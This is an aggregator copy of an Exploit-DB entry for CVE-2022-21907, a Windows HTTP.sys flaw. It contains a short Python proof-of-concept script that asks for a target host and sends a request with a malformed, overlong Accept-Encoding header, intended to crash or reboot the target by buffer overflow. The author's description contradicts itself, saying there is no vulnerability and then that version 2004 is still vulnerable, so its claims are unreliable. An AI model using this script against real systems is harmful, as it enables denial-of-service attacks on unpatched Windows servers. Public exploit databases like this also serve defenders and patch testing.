4

[remote] Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution

 1 year ago
source link: https://www.exploit-db.com/exploits/51575
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution

EDB-ID:

51575

EDB Verified:

Exploit:

  /  

Platform:

Windows

Date:

2023-07-07

Vulnerable App:

## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Author: nu11secur1ty
## Date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
## CVE-2022-21907


## Description:
NOTE: After a couple of hours of tests and experiments, I found that
there have been no vulnerabilities, this is just a ridiculous
experiment of Microsoft. When I decided to install the IIS packages on
these Windows platforms, everything was ok, and everything is patched!
Windows Server 2019, Windows 10 version 1809 - 2018 year are not
vulnerable by default, but after I decided to upgrade from 1909 to
2004. I found a serious problem! The Windows 10 version 2004 - 2020
year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
method: buffer overflow - deny of service and restart the system. This
problem exists, from last year which is reported on CVE-2021-31166,
and still there! On that days I have worked on it again with the help
and collaboration of Axel Souchet 0vercl0k the author of the idea. On
that day, I wrote an only one-line command to exploit this
vulnerability!

[+]Exploit:
```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE +"Sending of especially malicious crafted packages,
please wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,\
	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
	 ****************************stupiD, *, ,',})
# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)

## Time spend:
05:30:00

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK